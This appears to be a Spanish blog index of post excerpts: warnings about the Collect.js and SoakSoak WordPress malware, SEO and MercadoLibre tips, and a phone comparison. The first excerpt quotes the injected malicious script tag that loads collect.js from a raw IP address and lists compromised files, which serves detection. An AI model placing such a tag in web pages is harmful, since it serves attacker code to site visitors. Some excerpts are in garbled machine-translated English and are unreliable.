Nuevo virus despues de Soaksoak collect.js

English: This new virus that denominate Collect.j Spanish: Este nuevo virus que lo denominaremos Collect.js <script type=”text/javascript” src=”http://122.155.168.105/ads/inpage/pub/collect.js”></script> Sucesor del soaksoak abrio la puerta para este nuevo malware en el momento se encuentra alojado : Soaksoak successor opened the door for this new malware when it is hosted: the .ftpquota also .ftpquota M wp-admin/upgrade.php M wp-admin/press-this.php M…

Guía de eliminación SoakSoak.ru Malware para los sitios web de WordPress

Recientemente, un famoso software malicioso SoakSoak javascript ha infectado a cerca de 100.000 sitios web de WordPress (incluyendo al mio también). Google ha lista negra alrededor de 50.000 + sitios web que fueron infectadas por este software malicioso SoakSoak y todavía muchos sitios web van en listas negras. Este malware, básicamente, se inyecta en la swfobject.js archivo…

Trucos de Mercadolibre Ganar mas visitas

Para obtener más clics, es fundamental que tus anuncios sean atractivos y de buena calidad: Incluye palabras clave Piensa en las palabras que se usan para nombrar a tu producto y cuáles son las características que más se mencionan. Busca en Tendencias las palabras más buscadas en la categoría de tu anuncio. Crea anuncios usando diferentes palabras para probar…

Guía de Google Webmaster Tools: Como Posicionarse en Google

Guía de Google Webmaster Tools   Para empezar a utilizarla, primeramente debemos de darnos de alta en Google Webmaster Tools; para introducir nuestra web, en la Página Principal pulsamos sobre “Añadir un Sitio“, escribimos la URL y se nos ofrecerá el método recomendado, cargar un archivo HTML en el hosting, y varios alternativos: utilizar una etiqueta en el…

Sony Xperia Z2 vs iPhone 5s

El  Sony Xperia Z2  se perfila para ser el buque insignia de superar esta temporada de primavera, ya que mejora en gran medida de las especificaciones de la Z1 , y añade algunos extras, como altavoces estéreo.Por lo tanto tenemos que ponerlo en contra de los mejores de Apple por el momento – las 5s iPhone . Diseño La medición de…